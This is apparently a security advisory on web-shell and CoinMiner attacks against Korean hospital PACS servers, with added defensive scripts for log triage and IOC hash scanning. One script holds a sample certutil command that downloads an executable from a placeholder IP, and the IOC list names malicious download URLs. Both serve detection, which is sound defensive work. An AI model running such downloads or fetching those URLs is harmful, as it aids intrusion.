Severity
High
Analysis Summary
Researchers have identified attacks on the Windows IIS web server of a South Korean medical institution's Picture Archiving and Communication System (PACS) that ended in CoinMiner infections.
The attacks, suspected to be the work of Chinese-speaking threat actors, began with web shells such as Chopper and Behinder being uploaded to the server. The attackers then performed system reconnaissance, used Cpolar to establish remote access, and used BadPotato for privilege escalation. The CoinMiner was delivered through a "1.cab" archive containing a batch script, a Task Scheduler XML file, and a downloader.
According to the researchers, the attackers' toolkit also included further web shells (ASPXspy, Caidao), privilege escalation tools (PrintNotifyPotato, an IIS local privilege escalation tool, GodPotato), and port forwarding tools (Lcx, Frpc). Together these gave the attackers persistent access to and control over the compromised server, enabling further exploitation and cryptocurrency mining. Chinese-language comments in the scripts further point to Chinese-speaking operators.
Only days after the first attack, a second one hit the web server of another Korean medical institution. This time the attackers used certutil to download additional malware, alongside privilege escalation tools (GodPotato, PrintNotifyPotato, and an exploit for CVE-2021-1732, a Windows kernel (win32k) local privilege escalation vulnerability). They also used network scanning and remote-control tools such as fscan, a remote shell, and Netcat. EarthWorm served as a proxy tool, while Ladon, a versatile Chinese-built tool, was used in several stages of the attack.
These incidents show the continued targeting of vulnerable web servers in Korea, particularly by Chinese-speaking groups. To prevent such breaches, organizations should fix file upload vulnerabilities (the route by which the web shells were placed on the server), rotate passwords regularly, enforce access controls that block lateral movement, and keep antivirus software up to date. These measures are crucial for securing critical systems such as hospital PACS and other sensitive environments.
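The two behaviours described above, a web shell driven purely through POST requests to a script file dropped in an upload directory, and certutil used as a downloader, leave footprints in IIS W3C logs and process command lines. The following script is an added example written for this advisory, not code from the researchers or from any of the tools named; the log excerpt, the client addresses and the command lines are constructed samples, and the list of upload directories is an assumption to adapt to your own site layout.

```python
import re
from collections import defaultdict

# Constructed IIS W3C log excerpt for this example (not from the advisory).
# The attacker GETs the upload page, POSTs a file to it, and then drives a
# web shell dropped into the upload directory purely through POST requests.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-06-20 01:02:03 10.0.0.5 GET /default.aspx - 80 - 203.0.113.10 Mozilla/5.0 200
2024-06-20 01:02:10 10.0.0.5 GET /upload.aspx - 80 - 203.0.113.10 Mozilla/5.0 200
2024-06-20 01:02:14 10.0.0.5 POST /upload.aspx - 80 - 203.0.113.10 Mozilla/5.0 200
2024-06-20 01:02:20 10.0.0.5 POST /uploads/aa.aspx - 80 - 203.0.113.10 Mozilla/5.0 200
2024-06-20 01:02:21 10.0.0.5 POST /uploads/aa.aspx - 80 - 203.0.113.10 Mozilla/5.0 200
2024-06-20 01:02:25 10.0.0.5 GET /images/logo.png - 80 - 198.51.100.7 Mozilla/5.0 200
2024-06-20 01:03:00 10.0.0.5 POST /uploads/aa.aspx - 80 - 203.0.113.11 Mozilla/5.0 200
"""

SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|soap)$", re.I)
# Assumed directories that should only ever hold static content; an executable
# page under one of them is the classic footprint of a file upload vulnerability.
UPLOAD_DIRS = ("/uploads/", "/upload/", "/images/", "/files/", "/attachments/")


def parse_iis_log(text):
    """Yield one dict per request, using the #Fields header to name the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip it rather than misalign columns
        yield dict(zip(fields, values))


def find_webshell_candidates(text):
    """Return {uri: [reasons]} for script pages whose traffic looks like a web shell.

    Rule 1: a script page that is only ever POSTed to (never GET) and answers 200.
            Chopper/Behinder/Caidao-style shells are operated entirely by POST.
    Rule 2: a script page living under a directory meant for uploaded content.
    """
    methods = defaultdict(set)
    posters = defaultdict(set)
    for rec in parse_iis_log(text):
        uri = rec["cs-uri-stem"]
        if not SCRIPT_EXT.search(uri):
            continue
        if rec["sc-status"] == "200":
            methods[uri].add(rec["cs-method"].upper())
        if rec["cs-method"].upper() == "POST":
            posters[uri].add(rec["c-ip"])

    findings = {}
    for uri, seen in methods.items():
        reasons = []
        if seen == {"POST"}:
            reasons.append("post-only script page (%d client IPs)" % len(posters[uri]))
        if any(uri.lower().startswith(d) for d in UPLOAD_DIRS):
            reasons.append("executable page in upload directory")
        if reasons:
            findings[uri] = reasons
    return findings


# certutil abused as a downloader, as in the second attack. -urlcache and -f
# are certutil's real switches; the command lines below are constructed samples.
CERTUTIL_DOWNLOAD = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)

SAMPLE_COMMAND_LINES = [
    "certutil.exe -urlcache -split -f http://203.0.113.10/fscan.exe C:\\Windows\\Temp\\f.exe",
    "certutil -verifystore root",
    "cmd.exe /c whoami /priv",
]


def find_certutil_downloads(command_lines):
    """Return the command lines in which certutil fetches a remote URL."""
    return [c for c in command_lines if CERTUTIL_DOWNLOAD.search(c)]


if __name__ == "__main__":
    for uri, why in find_webshell_candidates(SAMPLE_IIS_LOG).items():
        print(uri, "->", "; ".join(why))
    for cmd in find_certutil_downloads(SAMPLE_COMMAND_LINES):
        print("certutil download:", cmd)
```

Run against real logs, rule 1 will also flag legitimate API endpoints that are POST-only by design, so treat it as a triage list and pair it with rule 2 and with the file's creation time on disk. Feed `find_certutil_downloads` with process creation command lines (Sysmon event 1 or Security event 4688 with command-line auditing enabled).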
Impact
- Sensitive Data Theft
- Unauthorized Access
- Privilege Escalation
- Financial Loss
Indicators of Compromise
Domain Name
- sinmaxinter.top
IP
- 14.19.214.36
- 1.119.3.28
MD5
- 67af0bc97b3ea18025a88a0b0201c18d
- f6591c1ab7f7b782c386af1b6c2c0e9b
- 986c8c6ee6f6a9d12a54cf84ad9b853a
- 2183043b19f4707f987d874ce44389e3
- 2c3de1cefe5cd2a5315a9c9970277bd7
- 69c7d9025fa3841c4cd69db1353179cf
- 10b6e46e1d4052b2ad07834604339b57
- 5f3dd0514c98bab7172a4ccb2f7a152d
- b81577dbe375dbc1d1349d8704737adf
SHA-256
- 2e8c7eacd739ca3f3dc4112b41a024157035096b8d0c26ba79d8b893136391bc
- 3a6091fd5b5755d0249ef4d6af11c807dbe902c2428f923ad2490e99ebbf06ad
- 24d373bab944de6f019e4c4744e56ed8b2f8803a82fb54bbf0882e11a95483c7
- 9f62c1d330dddad347a207a6a565ae07192377f622fa7d74af80705d800c6096
- 38440cb4263ab8e89751ddaee65912b1ae9604cffda0d6955191e4e669a57c96
- c3887213c1fb6721c8fe231fc65e62f1dbf7b2a4e3038900fce64807b66b4820
- e7301c5396d34960b6527f0f4f7ae72208f19a59ada273e07f23b68fc45eb61c
- 3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858
- 4ff8820d088b32f5ade6c9bb7d88f0291e08267c70235297c28c448bd42b9ab7
SHA-1
- 51847150b3dd7ee8ac71bddad558325476d75c69
- 2d65963e7a3251cab376a16d7507aa2d3f12f97c
- 409f39571d3ab244ef517b2fe8a44b646fb8b900
- f26028851f3b6f81c915ee1243173434fad86172
- f62f7a033a28757a6d638b99011ceca8e95b52f9
- 28880ee127c46e77dc440f158c1cd8c579d90e93
- 14400e1990244f850bd268621af28824c71e12cd
- 232a0585a7cb6c54e15d5410c96aac5913038e7f
- c12f1627ae31663c8d30a8fd17bc2b3674e13590
URL
- http://14.19.214.36/aa.aspx
- http://14.19.214.36/fscan.exe
- http://14.19.214.36/ew.exe
- http://14.19.214.36/11.exe
- http://14.19.214.36/RingQ.exe
- http://45.130.22.219/aspx.exe
- http://192.210.206.76/sRDI.dat
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Patch and upgrade platforms and software promptly, and make timely patching a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
- Along with network and system hardening, harden application code so that websites and software are secure; in this case the initial access was a file upload weakness that allowed web shells to be written to the server. Use testing tools to detect vulnerabilities in deployed code.
- Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
- On user endpoints, ad-blockers and disabling JavaScript in web browsers can reduce the risk of drive-by downloads of CoinMiner malware; note, however, that the attacks described here were server-side (web shells uploaded to IIS), which these browser controls do not mitigate.
- Use web application firewalls (WAF) to detect and block malicious traffic.
- Restrict the use of administrative privileges and use them only when necessary.
- Implement network segmentation to limit the spread of malware.
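To act on the "search for indicators of compromise" item above, the script below hashes every file under a directory once (feeding each chunk to MD5, SHA-1 and SHA-256 together) and reports matches against the hashes listed in the Indicators of Compromise section. It is an added example written for this advisory, not a tool from the researchers; the directory walk, function names and the "hello" sample used in the self-check are assumptions, and the hash sets are copied verbatim from the advisory.

```python
import hashlib
import os

# Hashes published in this advisory's Indicators of Compromise section.
ADVISORY_IOCS = {
    "md5": {
        "67af0bc97b3ea18025a88a0b0201c18d", "f6591c1ab7f7b782c386af1b6c2c0e9b",
        "986c8c6ee6f6a9d12a54cf84ad9b853a", "2183043b19f4707f987d874ce44389e3",
        "2c3de1cefe5cd2a5315a9c9970277bd7", "69c7d9025fa3841c4cd69db1353179cf",
        "10b6e46e1d4052b2ad07834604339b57", "5f3dd0514c98bab7172a4ccb2f7a152d",
        "b81577dbe375dbc1d1349d8704737adf",
    },
    "sha1": {
        "51847150b3dd7ee8ac71bddad558325476d75c69", "2d65963e7a3251cab376a16d7507aa2d3f12f97c",
        "409f39571d3ab244ef517b2fe8a44b646fb8b900", "f26028851f3b6f81c915ee1243173434fad86172",
        "f62f7a033a28757a6d638b99011ceca8e95b52f9", "28880ee127c46e77dc440f158c1cd8c579d90e93",
        "14400e1990244f850bd268621af28824c71e12cd", "232a0585a7cb6c54e15d5410c96aac5913038e7f",
        "c12f1627ae31663c8d30a8fd17bc2b3674e13590",
    },
    "sha256": {
        "2e8c7eacd739ca3f3dc4112b41a024157035096b8d0c26ba79d8b893136391bc",
        "3a6091fd5b5755d0249ef4d6af11c807dbe902c2428f923ad2490e99ebbf06ad",
        "24d373bab944de6f019e4c4744e56ed8b2f8803a82fb54bbf0882e11a95483c7",
        "9f62c1d330dddad347a207a6a565ae07192377f622fa7d74af80705d800c6096",
        "38440cb4263ab8e89751ddaee65912b1ae9604cffda0d6955191e4e669a57c96",
        "c3887213c1fb6721c8fe231fc65e62f1dbf7b2a4e3038900fce64807b66b4820",
        "e7301c5396d34960b6527f0f4f7ae72208f19a59ada273e07f23b68fc45eb61c",
        "3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858",
        "4ff8820d088b32f5ade6c9bb7d88f0291e08267c70235297c28c448bd42b9ab7",
    },
}


def _multi_hash(chunks):
    """Feed every chunk to all three digests so each file is read only once."""
    digests = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    for block in chunks:
        for d in digests.values():
            d.update(block)
    return {name: d.hexdigest() for name, d in digests.items()}


def hash_bytes(data):
    """Digests of an in-memory buffer (used for the self-check below)."""
    return _multi_hash([data])


def hash_file(path, chunk=1 << 20):
    """Digests of a file, streamed in 1 MiB chunks so large files fit in memory."""
    with open(path, "rb") as fh:
        return _multi_hash(iter(lambda: fh.read(chunk), b""))


def match_digests(digests, iocs=ADVISORY_IOCS):
    """Return [(algorithm, hash)] for every digest that appears in the IOC sets."""
    return [(algo, value.lower()) for algo, value in digests.items()
            if value.lower() in iocs.get(algo, ())]


def scan_tree(root, iocs=ADVISORY_IOCS):
    """Walk root and return [(path, algorithm, hash)] for every IOC match."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                digests = hash_file(path)
            except OSError:
                continue  # unreadable or vanished file: keep scanning the rest
            for algo, value in match_digests(digests, iocs):
                hits.append((path, algo, value))
    return hits


if __name__ == "__main__":
    import sys
    # Assumed default: the IIS web root, where the uploaded web shells lived.
    root = sys.argv[1] if len(sys.argv) > 1 else r"C:\inetpub\wwwroot"
    for path, algo, value in scan_tree(root):
        print("IOC MATCH", algo, value, path)
```

Point it at the web root first (the web shells and "1.cab" landed there), then at temp and user profile directories where downloaded tools typically sit. A hash match is a confirmed hit; an absence of matches is not a clean bill of health, because recompiled or repacked tools change every hash, so combine this with the behavioural checks (post-only script pages, certutil downloads, unexpected scheduled tasks) described in the analysis.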